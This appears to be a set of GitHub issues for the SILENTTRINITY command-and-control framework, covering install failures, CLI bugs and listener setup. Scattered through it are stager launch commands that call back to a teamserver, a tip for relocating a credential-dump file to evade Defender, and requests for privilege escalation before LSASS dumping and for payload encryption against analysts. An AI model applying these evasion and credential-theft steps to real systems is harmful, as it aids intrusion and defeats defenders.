  • Python Version: 3.7.2

Expected Behavior

Windows Defender as of March 4, 2019 is picking up msbuild.xml being executed. Renaming the msbuild.xml file did not change anything.

Current Behavior

Defender is blocking the backdoor connection back to Kali SILENTTRINITY.

Failure Information

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. Get latest Windows Defender definition update for March 4, 2019.
  2. Try to execute C:.....\msbuild.exe msbuild.xml
  3. Defender popped up a threat notification.
    ...

Failure Logs

Please include any relevant log snippets or files here. Try using: python3.7 st.py -d to get more information.

[BUG]

Thanks for the awesome work!

I tried to set up/install ST on Kali Linux ARM and amd64, following your step-by-step instructions; however, the dependencies fail to install.

OS
Linux nix 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux

errors:

An error occurred while installing aiofiles==0.4.0
An error occurred while installing cryptography==2.7
An error occurred while installing hypercorn==0.6.0
An error occurred while installing hyperframe==5.2.0
An error occurred while installing multidict==4.5.2
An error occurred while installing pycparser==2.19

As per your instructions, python3.7 is installed; I also tried pipenv, which throws similar issues.
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
pip3 install pipenv && pipenv install && pipenv shell

Any suggestions or ideas? Thanks

Stager SSL cipher errors on Windows 8.1 embedded industry pro

In the description it says that .NET 4.5 is needed to run the stager and the payloads. The Python web server throws a "no shared cipher" error. Is this something odd to do with Windows 8.1 Embedded? I am going to throw a Console.WriteLine in the inline C# stager and see if I can get any other info.

Crashed when looking for help on sessions

Context

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Kali 2019.1
  • Python Version: 3.7.3rc1

Expected Behavior

Expected help on sessions, or an error about a non-existent option...

Current Behavior

st.py server crashed when running 'sessions -h'

Failure Information

Steps to Reproduce

  1. Start https listener
  2. Generate powershell payload
  3. create session
  4. Run sessions -h from sessions menu

Failure Logs

ST (sessions) ≫ sessions -h
Traceback (most recent call last):
  File "st.py", line 163, in <module>
    loop()
  File "st.py", line 140, in __call__
    self.parse_result(result)
  File "st.py", line 95, in parse_result
    bound_cmd_handler = functools.partial(getattr(self.current_context, command[0]), args=command[1:])
TypeError: the first argument must be callable

Create aliases for start/run and make commands case insensitive

I keep forgetting I need to 'start' listeners, vs 'run' modules. It would be nice if ST were a little more forgiving, and both 'run' and 'start' worked to kick off a listener.

Along those same lines, it would be nice if commands were not case sensitive. For instance, when setting a listening port, "set port 8080" throws an 'unknown option port' error because the 'P' was not capitalized.

Current Behavior

Try running a listener with the run command. It won't start. Likewise when setting a port with a lowercase 'p'.

Error when compiling with msbuild.exe

Context

  1. I open the project in Visual Studio
  2. Generate the project (no error)
  3. Convert the SILENTTRINITY_DLL.dll to base64 with Out-CompressedDll -FilePath SILENTTRINITY_DLL.dll
  4. Copy the content to msbuild.xml file
  5. Launch C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
  6. Error when compiling
  • SILENTTRINITY Version: 0.1.0.dev
  • Operating System: Kali / Windows 10 (no defender)
  • Python Version: 3.7

Expected Behavior

When I use the default b64 string from the template msbuild.xml there is no error, but when I use the one from the compiled project, the b64 is not working.

Current Behavior

Error with the base64 of SILENTTRINITY_DLL.dll

Failure Information

Ps$> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml
Microsoft (R) Build Engine, version 4.8.3761.0
[Microsoft .NET Framework, Version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. Tous droits réservés.

La génération a démarré 25/05/2019 19:12:10.
Projet "C:\Users\bonclay\Desktop\msbuild.xml" sur le noud 1 (cibles par défaut).
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.Invoke(Object
 obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()
Génération du projet "C:\Users\bonclay\Desktop\msbuild.xml" terminée (cibles par défaut) -- ÉCHEC.


ÉCHEC de la build.

"C:\Users\bonclay\Desktop\msbuild.xml" (cible par défaut) (1) ->
(Hello1231231321321321 cible) ->
  C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: Échec inattendu de la tâche "ST".\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018: System.ArgumentException: Impossible de convert
ir l'objet de type 'System.String[]' en type 'System.String'.\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.RuntimeType.TryChangeType(Object va
lue, Binder binder, CultureInfo culture, Boolean needsSpecialCast)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.CheckArgument
s(Object[] parameters, Binder binder, BindingFlags invokeAttr, CultureInfo culture, Signature sig)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
ArgumentsCheck(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo cultu
re)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.RuntimeMethodInfo.Invoke
(Object obj, BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à System.Reflection.MethodBase.Invoke(Object
 obj, Object[] parameters)\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à InlineCode.ST.Execute() dans c:\Users\bonc
lay\AppData\Local\Temp\cqxgsizt.0.cs:ligne 63\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskExecutionHost.
Microsoft.Build.BackEnd.ITaskExecutionHost.Execute()\r
C:\Users\bonclay\Desktop\msbuild.xml(3,5): error MSB4018:    à Microsoft.Build.BackEnd.TaskBuilder.<Execu
teInstantiatedTask>d__26.MoveNext()

If running more than one module at the same time, output gets mixed up

Sessions run modules/tasks asynchronously; the way this is currently implemented (threads) has the unfortunate consequence of mixing up modules' output if more than one is running at the same time, because we're just hooking stdout using Console.SetOutput(). (https://github.com/byt3bl33d3r/SILENTTRINITY/blob/master/core/teamserver/data/stage.boo#L359-L379)

We really have only two options (unless i'm missing something obvious) to fix this:

  1. We run each module in its own separate process instead of a thread (which would allow us to keep using the print statement for a module's output but would complicate the code considerably)
  2. Pass a new StringBuilder() object to each module and append the output to it (this would allow us to keep using threads but we won't be able to use the print statement anymore to handle output which is really pretty)
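
A Python analogue of the problem described above, added here as an illustration and not code from the project (the agent's stage.boo is not reproduced): two threads that each swap the single process-wide stdout (redirect_stdout here, Console.SetOut in the agent) end up with one module's line in the other's buffer, whereas handing each module its own buffer (option 2) keeps the results apart. Module names and output lines are constructed; the Events only force the overlap so the failure reproduces every time.

```python
import io
import threading
from contextlib import redirect_stdout


def run_with_global_redirect():
    """Current design in Python terms: each module thread replaces the one
    shared stdout. B's redirect displaces A's, so A's second print lands in
    B's buffer. Returns (A's captured text, B's captured text)."""
    buf_a, buf_b = io.StringIO(), io.StringIO()
    a_started = threading.Event()     # A printed once under its redirect
    b_redirected = threading.Event()  # B swapped stdout and printed
    a_finished = threading.Event()    # A's second print is done
    b_finished = threading.Event()    # B restored stdout

    def module_a():
        with redirect_stdout(buf_a):
            print("[A] first line")
            a_started.set()
            b_redirected.wait()
            print("[A] second line")  # sys.stdout is buf_b right now
            a_finished.set()
            b_finished.wait()         # leave last so stdout unwinds in order

    def module_b():
        a_started.wait()
        with redirect_stdout(buf_b):  # overrides A's redirect process-wide
            print("[B] only line")
            b_redirected.set()
            a_finished.wait()         # keep the redirect active until A printed
        b_finished.set()

    threads = [threading.Thread(target=module_a), threading.Thread(target=module_b)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return buf_a.getvalue(), buf_b.getvalue()


def run_with_private_buffers():
    """Option 2 from the issue: every module writes to a buffer it was handed
    (a StringBuilder in .NET, StringIO here) and never touches the shared
    stdout, so overlapping threads cannot interleave. Returns (A, B) text."""
    def module_a(out):
        print("[A] first line", file=out)
        print("[A] second line", file=out)

    def module_b(out):
        print("[B] only line", file=out)

    results = {}

    def run_job(name, module):
        out = io.StringIO()
        module(out)
        results[name] = out.getvalue()  # one clean result per job

    threads = [threading.Thread(target=run_job, args=("A", module_a)),
               threading.Thread(target=run_job, args=("B", module_b))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results["A"], results["B"]


if __name__ == "__main__":
    print("global redirect :", run_with_global_redirect())
    print("private buffers :", run_with_private_buffers())
```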

Deal with them backslashes

Backslashes are currently not handled by the CLI, so specifying Windows paths is a PITA to say the least; this needs to be dealt with to preserve my sanity.


Add interactive shell module

Add an interactive shell module that essentially drops you into a Windows-like shell (instead of having to set the 'command' option in the cmd module).

Alternatively (or in addition), add the ability to control the beacon timing (such that I can set it to 1, and get almost immediate responses).

[BUG] `BindIP` option doesn't validate IP

Issue Template

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

jeff@blue:~/dev/SILENTTRINITY$ git branch
* master
jeff@blue:~/dev/SILENTTRINITY$ git rev-parse HEAD
c3b397d85dbb471c4f202151d30100e4222215eb
  • SILENTTRINITY Version: Latest master branch
  • OS running the Client: Ubuntu 18.04 x64
  • Python Version Running the Client: Python 3.7.4+
  • OS running the TeamServer: Ubuntu 18.04 x64 (same system as client)
  • Python version running the Teamserver: Python 3.7.4 (same system as client)

Expected Behavior

Either as BindIP is set, or before saying the server has been started with the start command, I'd expect ST to validate that the BindIP given is one that can be bound.

Current Behavior

Currently there's no feedback given about improper BindIP options in the client:

Failure Information

[1] ST (listeners)(http) ≫ options                                                                                                                                                                                 
┌Listener Options─────────┬───────────────────────────┬───────────────────────────────────────────────┐
│ Option Name  │ Required │ Value                     │ Description                                   │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Name         │ True     │ http                      │ Name for the listener.                        │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ BindIP       │ True     │ 192.168.252.192.168.252.1 │ The IPv4/IPv6 address to bind to.             │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Port         │ True     │ 80                        │ Port for the listener.                        │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ CallBackURls │ False    │                           │ Additional C2 Callback URLs (comma seperated) │
├──────────────┼──────────┼───────────────────────────┼───────────────────────────────────────────────┤
│ Comms        │ True     │ http                      │ C2 Comms to use                               │
└──────────────┴──────────┴───────────────────────────┴───────────────────────────────────────────────┘

The stager does give the following errors:

From PowerShell stager:

[*] Attempting HTTP POST to http://192.168.252.192.168.252.1/705213ab-e9e7-4f0d-8942-5b61719af2f4
[-] Attempt #1
        [!] The remote name could not be resolved: '192.168.252.192.168.252.1'
[-] Attempt #2
        [!] The remote name could not be resolved: '192.168.252.192.168.252.1'

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. Start listener and ST client as normal
  2. Create a new listener with an invalid IP (like 1.2.3.4.5.6, which is not how IPv6 works) set to BindIP
  3. Start the listener with the start command

Failure Logs

I think I've given all the relevant logs in Failure Information, but I can provide more information if needed.
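
One way a client could validate BindIP before a listener is started, added as an example and not the project's own code: a syntactic check with ipaddress, then a trial bind on an ephemeral port, which rejects both the malformed value above and a well-formed address that no local interface carries. The function names are mine; 203.0.113.7 is a documentation address used as a constructed "not local" sample.

```python
import ipaddress
import socket


def parse_bind_ip(value):
    """Return an IPv4Address/IPv6Address for a well-formed literal, else None.
    ipaddress rejects '192.168.252.192.168.252.1' and '1.2.3.4.5.6' outright."""
    try:
        return ipaddress.ip_address(value.strip())
    except ValueError:
        return None


def can_bind(addr):
    """Trial bind on port 0: succeeds only if a local interface carries the
    address. The socket is closed immediately; nothing is left listening."""
    family = socket.AF_INET6 if addr.version == 6 else socket.AF_INET
    try:
        with socket.socket(family, socket.SOCK_STREAM) as sock:
            sock.bind((str(addr), 0))
        return True
    except OSError:  # EADDRNOTAVAIL, EINVAL, ...
        return False


def check_bind_ip(value):
    """Validate a BindIP option the way the issue asks for; returns (ok, reason)."""
    addr = parse_bind_ip(value)
    if addr is None:
        return False, f"{value!r} is not a valid IPv4/IPv6 address"
    if not can_bind(addr):
        return False, f"{addr} is well-formed but no local interface carries it"
    return True, f"{addr} can be bound"


if __name__ == "__main__":
    # Constructed samples: the value from the issue, the one from the repro
    # steps, a loopback address and an RFC 5737 TEST-NET address.
    for value in ("192.168.252.192.168.252.1", "1.2.3.4.5.6", "127.0.0.1", "203.0.113.7"):
        ok, reason = check_bind_ip(value)
        print("[+]" if ok else "[-]", reason)
```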

[BUG] exe stager not working

Hi, I'd like to report what I think could be a bug and a couple of suggestions (not feature requests; I know a PR is the right path for that). Thanks in advance.

Context

Please provide any relevant information about your setup. This is important in case the issue is not reproducible except for under certain conditions.

  • SILENTTRINITY Version: Zuiikin 0.4.0dev
  • OS running the Client: BlackArch (not relevant, same result on Parrot Linux)
  • Python Version Running the Client: 3.7.4
  • OS running the TeamServer: BlackArch (not relevant, same result on Parrot Linux)
  • Python version running the Teamserver: 3.7.4

Expected Behavior

  1. Receive a stager once the .exe file is run under Windows (AV is off). It was working yesterday and is failing today, so it seems to be some kind of bug.

  2. Another expected behavior is to launch a "sessions" command without seeing any error even without any active session.

Current Behavior

  1. Just a timeout. It worked for me yesterday, but after doing git pull with the commits done today it is not working anymore. It is hard to tell you exactly which version due to the messy versioning method. As a suggestion I could say that commits to master shouldn't be allowed (the branch can be protected on GitHub) and after some commits on a dev branch, a PR to master could be done and tagged as a new version. In this way it is easier for you and for users to track what is happening and when. A CHANGELOG.md file could also help here. The sha1 of the commit on which I'm testing is b43044f2a343ff497ea9d1c931401a6523074904

  2. On the screenshot you can see (upper-left) an error shown on the teamserver console after launching a simple "sessions" command while there is no active session.

Failure Information

  1. Check the screenshot. The Windows cmd command is showing a "Timeout". Of course, the Windows (victim) and the attacker (Linux with teamserver and C&C client) machines are on a local LAN with full network visibility between them.

Steps to Reproduce

Please provide detailed steps for reproducing the issue.

  1. After installing, pipenv, etc. etc., launch the teamserver: python3 teamserver.py 192.168.0.161 xxxxxxx
  2. Connect the C&C client to the teamserver: python3 st.py wss://elvis:[email protected]:5000
  3. Set up a listener: listeners, use https, options, start https
  4. Set up a stager: stagers, use exe, generate https
  5. Copy stager.exe to the Windows victim machine
  6. Get the right guid and psk from sqlite db on the teamserver
  7. Execute the stager: stager.exe 206e3d7a-8df6-4c73-bdb7-9a6cd38ce24e 84e8b494da44aa861e11cc67d35dde9fa92230698d015c1eb67b40e6d2ae5f2b https://192.168.0.161
    ...

Failure Logs

(screenshot)

As a final suggestion I can say that after creating the .exe stager it is hard to know what the guid and the psk are. As you can see in the screenshot (bottom-right) I opened the sqlite db to get the right values. It would be nice to print the right values on the C&C client screen once the stager is created, to avoid that manual searching for the right values.

Thanks! This tool seems promising!

print() is a function in Python 3

flake8 testing of https://github.com/byt3bl33d3r/SILENTTRINITY on Python 3.7.0

$ flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics

./Server/modules/src/mimikatz.py:37:49: E999 SyntaxError: invalid syntax
    print "[+] Running in high integrity process"
                                                ^
./Server/modules/src/excelshellinject.py:11:39: E999 SyntaxError: invalid syntax
print "[*] Excel Version installed: {}".format(app_version)
                                      ^
./Server/modules/src/msgbox.py:7:14: E999 SyntaxError: invalid syntax
print 'Popped'
             ^
./Server/modules/src/powershell.py:31:23: E999 SyntaxError: invalid syntax
print PowerShellExecute("COMMAND_TO_RUN")
                      ^
./Server/modules/src/safetykatz.py:39:49: E999 SyntaxError: invalid syntax
    print "[+] Running in high integrity process"
                                                ^
./Server/modules/src/shell.py:9:45: E999 SyntaxError: invalid syntax
    print "[*] Path: {} Command: {} Args: {}".format(Path, ShellCommandName, ShellCommandArguments)
                                            ^
./Server/modules/src/msilshellexec.py:267:21: E999 SyntaxError: invalid syntax
print "[*] Type : {}".format(type(assembly))
                    ^
./Server/modules/src/execute-assembly.py:22:22: E999 SyntaxError: invalid syntax
        print Encoding.UTF8.GetString(buffer, 0, buffer.Length)
                     ^
./Server/data/stage.py:162:46: E999 SyntaxError: invalid syntax
        if DEBUG: print "Running job (id: {})".format(job['id'])
                                             ^
9     E999 SyntaxError: invalid syntax
9

Shell module - Special Character handling

It seems ST is unforgiving and particular when it comes to special characters in the shell module's command option. For instance, in order to successfully get a directory listing of C:\ your command must be "dir C:\\" or it won't work. Furthermore, I have yet to figure out how to handle spaces, so I can list the contents of something like "C:\Program Files" (I tried escaping the space with a backslash, two backslashes, quotation marks around the whole thing, escaping those quotation marks, etc. etc.).

Ultimately it would be nice if the end user didn't have to figure out proper escaping. For instance:

set Command dir "C:\Program Files"

If that's not possible, due to how you are processing module parameters, then maybe the next best thing is to include proper escaping techniques in the "Command" option description (listed when you type "options").

Context

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Kali 2019.2
  • Python Version: Python 3.7.3rc1

ST Setup & resulting behavior

HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client
Module = ipy/shell
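
An added illustration (not the project's code) of why "dir C:\\" is needed: a POSIX-style tokenizer such as shlex.split treats a backslash as an escape character, so a trailing one is an error and two are needed for one, whereas a non-POSIX shlex pass leaves Windows paths intact and still honours the quotes around "C:\Program Files". Whether ST's CLI actually uses shlex is an assumption on my part; the function names are mine and the command lines are constructed.

```python
import shlex


def tokenize_posix(line):
    """POSIX-style split: '\\' escapes the next character. A trailing backslash
    (as in 'dir C:\\') raises ValueError; 'C:\\\\' is needed to get 'C:\\'."""
    return shlex.split(line)


def _unquote(tok):
    """Strip one pair of matching surrounding quotes left by non-POSIX mode."""
    if len(tok) >= 2 and tok[0] == tok[-1] and tok[0] in "\"'":
        return tok[1:-1]
    return tok


def tokenize_windows(line):
    """Non-POSIX shlex pass: backslashes are ordinary characters and quotes
    only group words, so 'dir "C:\\Program Files"' splits into two tokens."""
    lexer = shlex.shlex(line, posix=False)
    lexer.whitespace_split = True  # split on whitespace only, not punctuation
    lexer.commenters = ""          # a '#' inside a command is not a comment
    return [_unquote(tok) for tok in lexer]


def compare(line):
    """Run both tokenizers on one command line; a POSIX ValueError is returned
    as a string so the caller can show it instead of crashing."""
    try:
        posix = tokenize_posix(line)
    except ValueError as exc:
        posix = f"error: {exc}"
    return {"posix": posix, "windows": tokenize_windows(line)}


if __name__ == "__main__":
    for cmd in ('dir C:\\', 'dir C:\\\\', 'dir "C:\\Program Files"'):
        print(repr(cmd), "->", compare(cmd))
```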

ZIP Encryption

Holla at you dudettes,

First of all, big thank you for your great work on the readme.md - helped me to understand all of this in a couple of minutes.

I have a feature request on the zip-file exchanging:
In my opinion it would make sense for the zip-blob to be encrypted server-side before sending it to the C# agent.
If the ZIP file is fetched by a sandbox or by an analyst, it is useless without the key, which might be implemented in the binary.

Hope I can contribute to this project in the near future 👍

[BUG] Listener http doesn't open port

Context

Setup:

  • SILENTTRINITY Version: 0.3.0dev
  • OS running the Client: kali 4.19.0-kali3-amd64
  • Python Version Running the Client: Python 3.7.3rc1
  • OS running the TeamServer: kali 4.19.0-kali3-amd64
  • Python version running the Teamserver: Python 3.7.3rc1

Expected Behavior

The listener should open the port configured in the "listeners/http" setup.

Current Behavior

After setting up and starting the listener, it doesn't open the port and the target host cannot reach the listener handler.

Failure Information

Starting the listener (Debug info from the teamserver):

2019-08-17 16:38:02,073 3296 MainThread - [DEBUG] protocol.py: write_frame - server > 
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "wfH3LrCwSx",
"ctx": "listeners",
"name": "list",
"status": "success",
"result": {"http": {"name": "http",
"author": "@byt3bl33d3r",
"description": "HTTP listener",
"running": true,
"options": {"Name": {"Description": "Name for the listener.",
"Required": true,
"Value": "listen_http"},
"BindIP": {"Description": "The IPv4/IPv6 address to bind to.",
"Required": true,
"Value": "10.0.2.15"},
"Port": {"Description": "Port for the listener.",
"Required": true,
"Value": "8123"},
"Comms": {"Description": "C2 Comms to use",
"Required": true,
"Value": "http"}}}}}', rsv1=False, rsv2=False, rsv3=False)

Stopping the listener (Debug info from the teamserver):

2019-08-17 16:39:40,705 3296 MainThread - [DEBUG] protocol.py: write_frame - server > 
Frame(fin=True, opcode=1, data=b'{"type": "message",
"id": "RyPmvQyfgV",
"ctx": "listeners",
"name": "stop",
"status": "success",
"result": null}', rsv1=False, rsv2=False, rsv3=False)

Steps to Reproduce

  1. python3 st.py wss://username:[email protected]:5000
  2. listeners
  3. use http
  4. set Port 8123
  5. start
  6. list

Failure Logs

Starting the teamserver:
(screenshot)

Starting the client:
(screenshot)

Thx, awesome project

Error in retrieving the stager

I set up Silent Trinity on Kali and retrieved all the requirements with pip. Launched st.py with python3 successfully.

Set up a listener and a stager using msbuild. Transferred the msbuild.xml to the target box and launched it with MSBuild.exe.

I get the error:

Error downloading https:///stage.zip: The underlying connection was closed: An unexpected error occurred on a send.

It seems unable to get the stager, and the Windows box is on the same network as the listener box.

Figure out the best way to handle binaries for modules

This came up in #54: keeping the binaries updated for every module is a hassle and too much work. @maaaaz mentioned that an alias command for the execute-assembly module might do the trick, and I think this is probably the best solution. If anyone has a better idea I'm all ears.

Automatically attempt to elevate permissions or add Get SYSTEM module

Context

  • SILENTTRINITY Version: 0.1.0dev
  • Operating System: Kali 2019.2
  • Python Version: Python 3.7.3rc1

ST Setup & resulting behavior

HTTPS Listener on 8080
MSBuild stager executed on Windows Server 2016 client, under the context of a domain user in the local administrators group
Module = ipy/mimikatz
run all

Output:

[+] f83a38c9-14fe-44ad-870f-2d70fc3e24e7 returned job result (id: LJpKMPve)
[-] Not in high integrity process

Expected Behavior

ST should attempt to elevate privileges to SYSTEM before running Mimikatz and/or any LSASS-related modules. Alternatively, create a separate module (such as MSF 'getsystem') which would achieve this purpose.

Current Behavior

Even if the session is running under the context of a user in the administrators group, LSASS modules fail to execute (dump memory).

safetykatz.py output folder

Hey byt3bl33d3r,

big fan of your work,

I noticed that in /module/src/safetykatz.py

the output folder destination "{0}\Temp\debug.bin" gets blocked by default on my Windows 10.

I changed it to:
dumpFile = "{0}\system32\spool\drivers\color\debug.bin".format(systemRoot)

And it works. Continue the good work!!
